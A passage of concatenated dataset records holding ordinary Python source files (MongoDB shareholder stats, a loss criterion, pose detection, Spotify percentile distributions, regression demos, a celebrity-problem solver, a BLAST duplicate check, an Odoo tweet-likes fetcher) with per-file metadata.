get_name_by_code(code):\n return ShareHolders.objects(code=code).first().name\n\n\ndef store_to_db(updatetime, code, name, period, ratio, max_datetime):\n sample = ShareHoldersBrief.objects(code=code, period=period)\n if sample:\n sample.update(updatetime=updatetime,\n ratio=ratio,\n max_datetime=max_datetime)\n else:\n ShareHoldersBrief(updatetime=updatetime,\n code=code,\n name=name,\n period=period,\n ratio=ratio,\n max_datetime=max_datetime).save()\n\n\nif __name__ == '__main__':\n mongoengine.connect('stock', host='127.0.0.1', port=27017)\n data = get_data()\n updatetime = datetime.now()\n for period in range(2, 21):\n share_holder_calculate(data, period, updatetime)\n", "sub_path": "iquant/datahandler/data_analysis/shareholders_trend.py", "file_name": "shareholders_trend.py", "file_ext": "py", "file_size_in_byte": 3237, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "iquant.mongodb.models.ShareHolders.objects", "line_number": 17, "usage_type": "call"}, {"api_name": 
"iquant.mongodb.models.ShareHolders", "line_number": 17, "usage_type": "name"}, {"api_name": "iquant.mongodb.models.ShareHolders.objects", "line_number": 65, "usage_type": "call"}, {"api_name": "iquant.mongodb.models.ShareHolders", "line_number": 65, "usage_type": "name"}, {"api_name": "iquant.mongodb.models.ShareHoldersBrief.objects", "line_number": 69, "usage_type": "call"}, {"api_name": "iquant.mongodb.models.ShareHoldersBrief", "line_number": 69, "usage_type": "name"}, {"api_name": "iquant.mongodb.models.ShareHoldersBrief", "line_number": 75, "usage_type": "call"}, {"api_name": "mongoengine.connect", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "225775824", "text": "# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\nimport torch\nimport torch.nn.functional as F\n\nfrom loggings import metrics\nfrom tools import utils\nfrom criterions import register_criterion\nfrom loggings.meters import safe_round\nfrom .cross_entropy import CrossEntropyCriterion\n\n@register_criterion('cross_entropy_uer')\nclass CrossEntropyUerCriterion(CrossEntropyCriterion):\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n sample_size = sample['ntokens']\n loss, losses = self.compute_loss(net_output, sample)\n\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample['ntokens'],\n 'nsentences': sample['target'].size(0),\n 'sample_size': sample_size,\n }\n\n if 'ce_loss' in losses:\n logging_output['ce_loss'] = losses['ce_loss']\n\n if 'qua_loss' in losses:\n logging_output['qua_loss'] = losses['qua_loss']\n\n # if not model.training:\n # import editdistance\n #\n # with torch.no_grad():\n # probs = F.softmax(logits, dim=-1).float().cpu()\n #\n # c_err = 0\n # c_len = 0\n # for p, t, inp_l in zip(\n # probs,\n # sample[\"target\"],\n # input_lengths,\n # ):\n # p = p[:inp_l].unsqueeze(0)\n #\n # p = (t != self.task.target_dictionary.pad()) & (\n # t != self.task.target_dictionary.eos()\n # )\n # targ = t[p]\n # targ_units_arr = targ.tolist()\n #\n # toks = p.argmax(dim=-1).unique_consecutive()\n # pred_units_arr = toks.tolist()\n #\n # c_err += editdistance.eval(pred_units_arr, targ_units_arr)\n # c_len += len(targ_units_arr)\n #\n # logging_output[\"c_errors\"] = c_err\n # logging_output[\"c_total\"] = c_len\n\n return loss, sample_size, logging_output\n\n def compute_loss(self, net_output, sample):\n logits = net_output['logits']\n target = sample['target']\n target_lengths = sample['target_lengths']\n target_paddings = 1 - utils.sequence_mask(target_lengths)\n losses = {}\n loss = ce_loss = cal_ce_loss(logits, target, target_paddings)\n losses['ce_loss'] = ce_loss\n\n if 'num_output' in net_output:\n _number = net_output['num_output']\n number = target_lengths.float()\n qua_loss = torch.sqrt(torch.pow(_number - number, 2)).sum()\n losses['qua_loss'] = qua_loss\n loss = loss + qua_loss * 0.01\n\n return loss, losses\n\n @staticmethod\n def reduce_metrics(logging_outputs) -> None:\n \"\"\"Aggregate logging outputs from data parallel 
training.\"\"\"\n loss_sum = sum(log.get('loss', 0) for log in logging_outputs)\n ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n\n metrics.log_scalar('loss', loss_sum / sample_size, sample_size, round=3)\n\n if 'ce_loss' in logging_outputs[0]:\n ce_loss = sum(log['ce_loss'] for log in logging_outputs) / ntokens\n metrics.log_scalar('ce_loss', ce_loss, ntokens, round=3)\n if 'qua_loss' in logging_outputs[0]:\n qua_loss = sum(log['qua_loss'] for log in logging_outputs) / nsentences\n metrics.log_scalar('qua_loss', qua_loss, nsentences, round=3)\n\n c_errors = sum(log.get(\"c_errors\", 0) for log in logging_outputs)\n metrics.log_scalar(\"_c_errors\", c_errors)\n c_total = sum(log.get(\"c_total\", 0) for log in logging_outputs)\n metrics.log_scalar(\"_c_total\", c_total)\n\n if c_total > 0:\n metrics.log_derived(\n \"uer\",\n lambda meters: safe_round(meters[\"_c_errors\"].sum * 100.0 / meters[\"_c_total\"].sum, 3)\n if meters[\"_c_total\"].sum > 0\n else float(\"nan\"),\n )\n\n\ndef cal_ce_loss(logits, target_labels, target_paddings, label_smooth=0.0):\n losses = _compute_cross_entropy_losses(logits, target_labels.long(), target_paddings)\n loss = losses.sum()\n if label_smooth > 0:\n loss = loss * (1-label_smooth) + _uniform_label_smooth(logits, target_paddings)*label_smooth\n\n return loss\n\n\ndef _uniform_label_smooth(logits, paddings):\n log_probs = F.log_softmax(logits, dim=-1)\n nlabel = log_probs.shape[-1]\n ent_uniform = -torch.sum(log_probs, dim=-1)/nlabel\n\n return torch.sum(ent_uniform*(1-paddings).float())\n\n\ndef _compute_cross_entropy_losses(logits, labels, paddings):\n B, T, V = logits.shape\n losses = F.cross_entropy(logits.contiguous().view(-1, V),\n labels.contiguous().view(-1),\n reduction=\"none\").view(B, T) * (1-paddings).float()\n\n return losses\n", "sub_path": "src/criterions/cross_entropy_uer.py", "file_name": "cross_entropy_uer.py", "file_ext": "py", "file_size_in_byte": 5511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cross_entropy.CrossEntropyCriterion", "line_number": 15, "usage_type": "name"}, {"api_name": "tools.utils.sequence_mask", "line_number": 78, "usage_type": "call"}, {"api_name": "tools.utils", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.sqrt", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 86, "usage_type": "call"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 100, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 100, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 104, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 104, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 107, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 107, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 110, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 110, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 112, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 112, "usage_type": "name"}, {"api_name": "loggings.metrics.log_derived", "line_number": 115, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 115, 
"usage_type": "name"}, {"api_name": "loggings.meters.safe_round", "line_number": 117, "usage_type": "call"}, {"api_name": "criterions.register_criterion", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 142, "usage_type": "name"}]} +{"seq_id": "216065726", "text": "import cv2 \nimport mediapipe as mp\nimport time\n\n\nclass poseDetect():\n def __init__(self,mode=False,upBody=False,smooth=True,detectioncon=0.5,trackcon=0.5):\n \"\"\"\n Initilize all required parameters\n mode : Bool, False if you wanna use track and True if using detection \n upBody : Bool, True if you wanna detect only up body else false\n smooth : Bool, True if smooth else false\n detectioncon : Float, value of detection confident \n trackcon : Float, value of trackcon\n \"\"\"\n self.mode=mode\n self.upBody = upBody\n self.smooth = smooth\n self.detectioncon=detectioncon \n self.trackcon=trackcon\n self.mpPose = mp.solutions.pose\n self.mpDraw = mp.solutions.drawing_utils\n self.pose = self.mpPose.Pose(self.mode,self.upBody,self.smooth,self.detectioncon,self.trackcon)\n\n def findPose(self,img,draw=True):\n \"\"\"\n Function which uses mediapipe to find and draw pose detected\n\n arguments :- \n img :- Frame for which you want to find pose\n draw :- Bool value, True if you want to draw the pose else False\n\n Returns :- \n img : Frame after drawing the cordinates given by mediapipe\n \"\"\"\n imgRGB= cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n #imgRGB= img # when you record in ubuntu color format is already RGB\n\n self.results = self.pose.process(imgRGB)\n landmark= self.results.pose_landmarks\n if landmark:\n if draw:\n self.mpDraw.draw_landmarks(img,landmark,self.mpPose.POSE_CONNECTIONS)\n else:\n self.mpDraw.draw_landmarks(img,landmark)\n return img\n\n def getPosition(self,img,draw=True):\n \"\"\"\n Function to get cordiinated of 33 key points detected and return them as a list \n\n arguments :-\n img : Frame for which key points needs to be detected\n Draw : Bool, True if want to draww detected coordinates on frame else false \n\n Returns :-\n list of 33 key points coordinates in a frame\n \"\"\"\n lmList=[]\n if self.results.pose_landmarks:\n for id,lm in enumerate(self.results.pose_landmarks.landmark):\n h,w,c = img.shape \n cx,cy,cz = int(lm.x*w), int(lm.y*h), int(lm.z*c) #to find value in pixels\n lmList.append([cx,cy])\n if draw:\n cv2.circle(img,(cx,cy), 4,(255,0,0),cv2.FILLED)\n return lmList\n \n\n", "sub_path": "Pose.py", "file_name": "Pose.py", "file_ext": "py", "file_size_in_byte": 2552, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mediapipe.solutions", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 66, "usage_type": "attribute"}]} +{"seq_id": "49209185", 
"text": "#creates distributions of values corresponding to spotifys data\n#reports percentiles of values given these distributions\n\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom os import path\n\n#the following do not have a percentile associated with them\nNO_PERCENTILE = [\"key\",\"mode\",\"time_signature\",\"name\"]\n\n#descriptions of distributions of respective key\n#see more about these distributions at https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/\nFRACTION_DIST = {\"acousticness\":[3000,800,625,500,450,400,390,380,350,348,345,340,350,345,320,340,400,405,410,500],\n \"danceability\":[20,40,75,180,198,250,375,450,600,775,950,1010,1020,1050,1000,825,625,350,175,75],\n \"energy\":[190,150,200,240,250,300,350,400,495,560,600,650,640,750,770,800,725,720,705,535],\n \"instrumentalness\":[7600,100,75,50,75,75,50,50,50,25,25,50,50,60,75,100,150,225,300,125],\n \"liveness\":[250,2450,2900,965,650,500,625,480,200,175,160,155,150,155,160,150,140,145,145,145,160,175],\n \"speechiness\":[4800,2660,800,400,330,250,200,150,100,75,30,30,5,5,5,5,30,50,150,0],\n \"valence\":[320,380,440,550,510,595,600,650,550,575,585,650,525,540,490,485,475,400,360,315]}\n\n#tempo and loudness are unique, non-fractional, distributions\nLOUDNESS = [5,5,5,20,20,20,50,65,75,100,150,200,350,500,960,1550,2750,2850,550,25]\nTEMPO = [25,0,0,0,20,40,135,760,1125,1375,1200,1740,1300,760,510,500,250,100,75,10]\n\n#hold all created distributions keyed by their name\nALL_DIST = {}\n\n#creates an array distributed such that values correspond a histogram described by 'vals'\ndef create_distribution(vals, starting_val, bin_width):\n dist = np.zeros(1)\n i=0\n offset = starting_val\n\n #fill array with linearly spaced numbers found from 'vals'\n while i<20:\n temp = np.linspace(offset, offset+bin_width, vals[i])\n dist = np.concatenate((dist, temp))\n i+=1\n offset+=bin_width\n return dist\n\n#calculates 'num' percentile in distribution 'dist'\ndef get_percentile(name, num):\n return stats.percentileofscore(ALL_DIST[name],num)\n\n#find the percentiles for the attribute averages for the entire playlist\ndef get_overall_percentile(attribute_avg, attribute_percentile):\n for attr in attribute_avg:\n if attr not in NO_PERCENTILE:\n attribute_percentile[attr] = get_percentile(attr,attribute_avg[attr])\n\n#finds the most extreme song (percentile wise) for every attribute\ndef calculate_extreme_songs(songs, high_songs, low_songs):\n #loop through every song and its attributes\n for song in songs:\n for attr in songs[song]:\n if attr not in NO_PERCENTILE:\n percentile = round(get_percentile(attr, songs[song][attr]),2)\n #if the percentile is more extreme than anything encountered before, store it\n if percentile > high_songs[attr][1]:\n high_songs[attr] = [songs[song][\"name\"],percentile, songs[song][attr]]\n if percentile < low_songs[attr][1]:\n low_songs[attr] = [songs[song][\"name\"],percentile, songs[song][attr]]\n\n#loads distributions from a file or creates them if no file is found\ndef init():\n file_path = f\"{path.dirname(path.realpath(__file__))}/spotify_distributions.npy\"\n #if no distribution file is found create one\n if not path.exists(file_path):\n #create all the distributions\n for descrip in FRACTION_DIST:\n ALL_DIST[descrip] = create_distribution(FRACTION_DIST[descrip], 0, 0.05)\n\n #loudness and tempo are scaled differently, create seperately\n ALL_DIST[\"loudness\"] = create_distribution(LOUDNESS, -40, 2)\n 
ALL_DIST[\"tempo\"] = create_distribution(TEMPO, 0, 11)\n\n #song length is normally distributed, approx described as below\n ALL_DIST[\"duration_ms\"] = np.random.normal(242000, scale=75000, size=10000)\n\n np.save(\"spotify_distributions.npy\", ALL_DIST)\n else:\n #if file found, load it\n dist_file = np.load(file_path, allow_pickle=True)\n for item in dist_file.item():\n ALL_DIST[item] = dist_file.item().get(item)\n \n\n\n\n\n", "sub_path": "playsite/playlister/scripts/distributions.py", "file_name": "distributions.py", "file_ext": "py", "file_size_in_byte": 4207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.stats.percentileofscore", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.realpath", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "512573796", "text": "import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# cf: https://github.com/antoine-eon/olga/tree/master/Algorithme/Algo%20Reseau%20Neuronal%20Regression%20Lineaire%20EX\n\n# Load the data and create the data matrices X and Y\n# This creates a feature vector X with a column of ones (bias)\n# and a column of car weights.\n# The target vector Y is a column of MPG values for each car.\n\nX_file = np.genfromtxt('mpg.csv', delimiter=',', skip_header=1)\nN = np.shape(X_file)[0]\nX = np.hstack((np.ones(N).reshape(N, 1), X_file[:, 4].reshape(N, 1)))\nY = X_file[:, 0]\n\n# Standardization\nX[:, 1] = (X[:, 1]-np.mean(X[:, 1]))/np.std(X[:, 1])\n\n# Two weights (bias and feature)\nw = np.array([0, 0])\n\n# Batch gradient descent\n# size eta\nmax_iter = 100\neta = 1e-4\nfor t in range(0, max_iter):\n print(t)\n # We iterate over each data point for one epoch\n grad_t = np.array([0., 0.])\n for i in range(0, N):\n x_i = X[i, :]\n y_i = Y[i]\n h = np.dot(w, x_i)-y_i\n grad_t += 2*x_i*h\n # Update the weights\n w = w - eta*grad_t\n \n # Plot the data and best fit line\n tt = np.linspace(np.min(X[:, 1]), np.max(X[:, 1]), 10)\n bf_line = w[0]+w[1]*tt\n plt.plot(X[:, 1], Y, 'kx', tt, bf_line)#, label = t)\n\n# Plot the data and best fit line\nplt.plot(X[:, 1], Y, 'kx', tt, bf_line, 'r-')\nplt.savefig('figure1.png')\n\nplt.show()\nprint(\"Weights found:\",w)\n\n\n", "sub_path": "ANNregression/ANNregression.py", "file_name": "ANNregression.py", "file_ext": "py", "file_size_in_byte": 1421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 2, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 13, "usage_type": "call"}, {"api_name": 
"numpy.shape", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "529659480", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 22:32:24 2018\n\n@author: BHAVI CHAWLA\n\"\"\"\n\n# Decision Tree Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n# Fitting Decision Tree Regression to the dataset\nfrom sklearn.tree import DecisionTreeRegressor\n# all default paramenters\nregressor = DecisionTreeRegressor(random_state = 0) # default criterion - mean square error\nregressor.fit(X, y)\n\n# Predicting a new result\ny_pred = regressor.predict(6.5)\n\n\n# Visualising the Regression results\n''' problem coz of resolution - Non linear, Non Continuous '''\n''' in this plot, it is predicting the scattered points of the dataset i.e the 10 points '''\n#plt.scatter(X, y, color = 'red')\n#plt.plot(X, regressor.predict(X), color = 'blue')\n#plt.title('Truth or Bluff (Decision Tree Regression)')\n#plt.xlabel('Position level')\n#plt.ylabel('Salary')\n#plt.show()\n\n# Visualising the Decision Tree Regression results (higher resolution)\n''' Splitting into intervals, considering avg of values in interval and assigning it to the point for which we need prediction '''\nX_grid = np.arange(min(X), max(X), 0.01)\nX_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X_grid, regressor.predict(X_grid), color = 'blue')\nplt.title('Truth or Bluff (Decision Tree Regression)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()", "sub_path": "Part 2 - Regression/Section 8 - Decision Tree Regression/Decision_Tree_Regression/decision_tree_regression_own.py", "file_name": "decision_tree_regression_own.py", "file_ext": "py", "file_size_in_byte": 1540, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", 
"line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "552592309", "text": "'''\nFunction Arguments :\n\t\t@param :m (boolean matrix of size n*n), n(no of rows and cols )\n\t\t@return : Integer\n'''\ndef getId(arr,n):\n ans = -1\n for i in range(n):\n count = 0\n for j in arr[i]:\n \n if j == 0:\n count += 1\n else:\n break\n if count == n and ans == -1:\n ans = i\n elif count == n:\n return -1\n return ans\n\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\nimport atexit\nimport io\nimport sys\n\n#Contributed by :Shardul Rane\n\n_INPUT_LINES = sys.stdin.read().splitlines()\ninput = iter(_INPUT_LINES).__next__\n_OUTPUT_BUFFER = io.StringIO()\nsys.stdout = _OUTPUT_BUFFER\n\n@atexit.register\n\ndef write():\n sys.__stdout__.write(_OUTPUT_BUFFER.getvalue())\n\nif __name__ == '__main__':\n test_cases = int(input())\n for cases in range(test_cases) :\n n = int(input())\n a = list(map(int,input().strip().split()))\n k = 0\n m = []\n for i in range(n):\n row = []\n for j in range(n):\n row.append(a[k])\n k+=1\n m.append(row)\n print(getId(m,n))\n# } Driver Code Ends", "sub_path": "GeeksForGeeks/celebrity_problem.py", "file_name": "celebrity_problem.py", "file_ext": "py", "file_size_in_byte": 1191, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.stdin.read", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 33, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.__stdout__.write", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.__stdout__", "line_number": 41, "usage_type": "attribute"}, {"api_name": "atexit.register", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "458258208", "text": "\"\"\"\nA function to test for a multiple/nonmultiple hit.\nThe detection of multiplicated genes is valuable both by itself (as a chapter in\nmy thesis) and as a stage in a phylomic analysis. An alignment of multiplicated\ngene to its non-multiplicated counterpart is unreliable, as the short one will\nmore or less randomly align to one of the modules of the multiple. 
It creates a\nlot of problems: the distance calculated is one of several equally valid values\n(one for each module), the alignment for ML/bayesian is needlessly bloated, a\nremarkable evolutionary event is ignored altogether.\nCurrently I assume that a multiplication of a gene is much more common than a\npreviously repeat-containing gene being split in pieces. Thus, the (ancestral)\nshorter form is always assumed to be in a hit, and the longer in a query.\n\"\"\"\n\nfrom itertools import combinations\n\n\ndef overlap(range1, range2):\n \"\"\"\n Return True if two ranges overlap\n :param range1:\n :param range2:\n :return:\n \"\"\"\n if range1[0] <= range2[1] and range2[0] <= range1[1]:\n return True\n return False\n\n\ndef overlap_len(range1, range2):\n \"\"\"\n Return the overlap length between two ranges\n :param range1:\n :param range2:\n :return:\n \"\"\"\n return min(range1[1], range2[1]) - max(range1[0], range2[0])\n\n\ndef is_duplicate(hit, overlap_cutoff=0.5, len_cutoff=50):\n \"\"\"\n Return True if this hit covers several regions of query sequence with the\n same region of hit sequence.\n Accepts two optional parameters:\n `len_cutoff` is a minimum length (on hit) an HSP must have to be considered\n meaningful. Defaults to 50.\n `overlap_cutoff` is a minimum percentage of both hsps that should be in the\n overlap for it to be considered meaningful. Defaults to 0.5\n :param hit: BlastHit\n :param overlap_cutoff: int\n :param len_cutoff: int\n :return:\n \"\"\"\n if len(hit.hsps) < 2:\n # Obviously one-HSP hit can't have the evidence we look for\n return False\n valid_hsps = filter(lambda x: abs(x.hit_pos[1]-x.hit_pos[0]) > len_cutoff,\n hit.hsps)\n for h1, h2 in combinations(valid_hsps, 2):\n if overlap(h1.hit_pos, h2.hit_pos) and \\\n not overlap(h1.query_pos, h2.query_pos):\n l = overlap_len(h1.hit_pos, h2.hit_pos)\n if l >= abs(h1.hit_pos[1]-h1.hit_pos[0]) * overlap_cutoff and \\\n l >= abs(h2.hit_pos[1]-h2.hit_pos[0]) * overlap_cutoff:\n return True\n return False\n", "sub_path": "multiplicates.py", "file_name": "multiplicates.py", "file_ext": "py", "file_size_in_byte": 2511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "itertools.combinations", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "221392097", "text": "import logging\nimport tweepy\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\n\n\nLOGGER = logging.getLogger(__name__)\nSOCIAL_NETWORK = [('twitter', 'Twitter')]\n\n\nclass ProductSocial(models.Model):\n\n _name = 'bp.product.social'\n _rec_name = 'product_id'\n _sql_constraints = [('social_network_unique', 'unique(social_network)',\n _('The URL must be unique'))]\n\n product_id = fields.Many2one(\n comodel_name='product.product',\n string=_('Product'),\n required=True\n )\n\n social_url = fields.Char(string=_('Social URL'), required=True)\n\n likes = fields.Integer(string=_('Likes'), readonly=True)\n\n social_network = fields.Selection(\n selection=SOCIAL_NETWORK,\n string=_('Social network'),\n required=True\n )\n\n @api.model\n def get_tweet_id_from(self, url):\n import re\n temp = re.findall(r'\\d+', url)\n res = list(map(int, temp))\n return str(max(res))\n\n @api.model\n def get_likes(self, network='twitter'):\n LOGGER.info(\"Fetching likes from tweets about products...\")\n\n try:\n access = self.env['bp.access.api'].search([('name', '=', network)])\n\n CONSUMER_KEY = access.consumer_key\n CONSUMER_SECRET = access.consumer_secret\n\n 
OAUTH_TOKEN = access.oauth_token\n OAUTH_TOKEN_SECRET = access.oauth_token_secret\n\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n api = tweepy.API(auth)\n\n for rec in self.env['bp.product.social'].search([]):\n id_of_tweet = self.get_tweet_id_from(rec.social_url)\n tweet = api.get_status(id_of_tweet)\n rec.write({'likes': tweet._json['favorite_count']})\n\n except tweepy.error.TweepError:\n raise UserError(\n _('Please, register your credentials on Access tokens'))\n", "sub_path": "addons/bp_social_selling/models/product_social.py", "file_name": "product_social.py", "file_ext": "py", "file_size_in_byte": 1976, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "odoo.models.Model", "line_number": 11, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 11, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 16, "usage_type": "call"}, {"api_name": "odoo.fields.Many2one", "line_number": 18, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 18, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 20, "usage_type": "call"}, {"api_name": "odoo.fields.Char", "line_number": 24, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 24, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 24, "usage_type": "call"}, {"api_name": "odoo.fields.Integer", "line_number": 26, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 26, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 26, "usage_type": "call"}, {"api_name": "odoo.fields.Selection", "line_number": 28, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 28, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 30, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 37, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 34, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 34, "usage_type": "name"}, {"api_name": "tweepy.OAuthHandler", "line_number": 54, 